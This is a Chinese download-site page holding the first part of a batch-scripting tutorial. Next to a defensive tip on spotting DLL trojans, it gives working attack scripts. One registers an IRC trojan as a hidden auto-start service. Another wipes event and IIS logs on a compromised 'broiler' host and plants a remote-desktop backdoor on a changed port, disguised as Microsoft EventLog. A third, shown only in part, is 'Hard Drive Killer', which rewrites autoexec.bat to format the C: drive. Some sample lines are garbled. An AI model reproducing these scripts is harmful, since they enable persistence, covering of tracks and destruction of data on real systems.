⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 简明批处理教程.txt

📁 简明的批处理教程
💻 TXT
📖 第 1 页 / 共 4 页
字号:
  echo hello world>c:\hello.txt (stupid example?) 

  sample2: 

  时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录: 

  运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 

  这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 

  日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了. 

  这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行: 

  CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。 

3.< 、>& 、<& 

  < 从文件中而不是从键盘中读入命令输入。 

  >& 将一个句柄的输出写入到另一个句柄的输入中。 

  <& 从一个句柄读取输入并将其写入到另一个句柄输出中。 

  这些并不常用,也就不多做介绍。 

  No.5 

  五.如何用批处理文件来操作注册表 

  在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件) 

  关于注册表的操作,常见的是创建、修改、删除。 

  1.创建 

  创建分为两种,一种是创建子项(Subkey) 

  我们创建一个文件,内容如下: 

  Windows Registry Editor Version 5.00 

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker] 

  然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。 

  另一种是创建一个项目名称 

  那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下: 

  Windows Registry Editor Version 5.00 

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch" 

  "Door"=C:\\WINNT\\system32\\door.exe 

  "Autodos"=dword:02 

  这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下 

  新建了:Invader、door、about这三个项目 

  Invader的类型是“String Value” 

  door的类型是“REG SZ Value” 

  Autodos的类型是“DWORD Value” 

  2.修改 

  修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。 

  3.删除 

  我们首先来说说删除一个项目名称,我们创建一个如下的文件: 

  Windows Registry Editor Version 5.00 

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

  "Ex4rch"=- 

  执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了; 

  我们再看看删除一个子项,我们创建一个如下的脚本: 

  Windows Registry Editor Version 5.00 

  [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

  执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。 

  相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。 

 samlpe1:如上面的那个例子,如想生成如下注册表文件 

  Windows Registry Editor Version 5.00 

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

  "Invader"="Ex4rch" 

  "door"=hex:255 

  "Autodos"=dword:000000128 

  只需要这样: 

  @echo Windows Registry Editor Version 5.00>>Sample.reg 

  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg 

  @echo "Invader"="Ex4rch">>Sample.reg 

  @echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg 

  @echo "Autodos"=dword:02>>Sample.reg 

  samlpe2: 

  我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe) 

  @start windrv32.exe 

  @attrib +h +r windrv32.exe 

  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll 

  @echo "windsnx "=- >>patch.dll 

  @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe 

  @regedit /s patch.dll 

  @delete patch.dll 

  @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动] 

  @REM 这样不是更安全^_^. 
六.精彩实例放送。 

  1.删除win2k/xp系统默认共享的批处理 

  ------------------------ cut here then save as .bat or .cmd file --------------------------- 

  @echo preparing to delete all the default shares.when ready pres any key. 

  @pause 

  @echo off 

  :Rem check parameters if null show usage. 

  if {%1}=={} goto :Usage 

  :Rem code start. 

  echo. 

  echo ------------------------------------------------------ 

  echo. 

  echo Now deleting all the default shares. 

  echo. 

  net share %1$ /delete 

  net share %2$ /delete 

  net share %3$ /delete 

  net share %4$ /delete 

  net share %5$ /delete 

  net share %6$ /delete 

  net share %7$ /delete 

  net share %8$ /delete 

  net share %9$ /delete 

  net stop Server 

  net start Server 

  echo. 

  echo All the shares have been deleteed 

  echo. 

  echo ------------------------------------------------------ 

  echo. 

  echo Now modify the registry to change the system default properties. 

  echo. 

  echo Now creating the registry file 

  echo Windows Registry Editor Version 5.00> c:\delshare.reg 

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg 

  echo "AutoShareWks"=dword:00000000>> c:\delshare.reg 

  echo "AutoShareServer"=dword:00000000>> c:\delshare.reg 

  echo Nowing using the registry file to chang the system default properties. 

  regedit /s c:\delshare.reg 

  echo Deleting the temprotarily files. 

  del c:\delshare.reg 

  goto :END 
 :Usage 

  echo. 

  echo ------------------------------------------------------ 

  echo. 

  echo ☆ A example for batch file ☆ 

  echo ☆ [Use batch file to change the sysytem share properties.] ☆ 

  echo. 

  echo Author:Ex4rch 

  echo Mail:Ex4rch@hotmail.com QQ:1672602 

  echo. 

  echo Error:Not enough parameters 

  echo. 

  echo ☆ Please enter the share disk you wanna delete ☆ 

  echo. 

  echo For instance,to delete the default shares: 

  echo delshare c d e ipc admin print 

  echo. 

  echo If the disklable is not as C: D: E: ,Please chang it youself. 

  echo. 

  echo example: 

  echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into : 

  echo delshare c d e x y z ipc admin print 

  echo. 

  echo *** you can delete nine shares once in a useing *** 

  echo. 

  echo ------------------------------------------------------ 

  goto :EOF 

  :END 

  echo. 

  echo ------------------------------------------------------ 

  echo. 

  echo OK,delshare.bat has deleted all the share you assigned. 

  echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. 

  echo 

  echo. 

  echo ------------------------------------------------------ 

  echo. 

  :EOF 

  echo end of the batch file 

  ------------------------ cut here then save as .bat or .cmd file --------------------------- 
--------------------------- 

  下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 

  @regedit /s patch.dll 

  @net stop w3svc 

  @net stop event log 

  @del c:\winnt\system32\logfiles\w3svc1\*.* /f /q 

  @del c:\winnt\system32\logfiles\w3svc2\*.* /f /q 

  @del c:\winnt\system32\config\*.event /f /q 

  @del c:\winnt\system32dtclog\*.* /f /q 

  @del c:\winnt\*.txt /f /q 

  @del c:\winnt\*.log /f /q 

  @net start w3svc 

  @net start event log 

  @rem [删除日志] 

  @net stop lanmanserver /y 

  @net stop Schedule /y 

  @net stop RemoteRegistry /y 

  @del patch.dll 

  @echo The server has been patched,Have fun. 

  @del patch.bat 

  @REM [禁止一些危险的服务。] 

  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll 

  @echo "PortNumber"=dword:00002010 >>patch.dll 

  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll 

  @echo "PortNumber"=dword:00002012 >>patch.dll 

  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll 

  @echo "Start"=dword:00000002 >>patch.dll 

  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll 

  @echo "Start"=dword:00000002 >>patch.dll 

  @echo "ErrorControl"=dword:00000001 >>patch.dll 

  @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll 

  @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll 

  @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll 

  @echo "ObjectName"="LocalSystem" >>patch.dll 

  @echo "Type"=dword:00000010 >>patch.dll 

  @echo "Description"="Keep record of the program and windows message。" >>patch.dll 

  @echo "DisplayName"="Microsoft EventLog" >>patch.dll 

  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll 

  @echo "Start"=dword:00000004 >>patch.dll 

  @copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe 

  @REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路] 

   3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。) 

  ------------------------ cut here then save as .bat or .cmd file --------------------------- 

  @echo off 

  rem This program is dedecated to a very special person that does not want to be named. 

  :start 

  cls 

  echo PLEASE WAIT WHILE PROGRAM LOADS . . . 

  call attrib -r -h c:\autoexec.bat >nul 

  echo @echo off >c:\autoexec.bat 

  echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat 

  call attrib +r +h c:\autoexec.bat >nul 

  rem Drive checking and assigning the valid drives to the drive variable. 

  set drive= 

  set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z 

  rem code insertion for Drive Checking takes place here. 

  rem drivechk.bat is the file name under the root directory. 

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -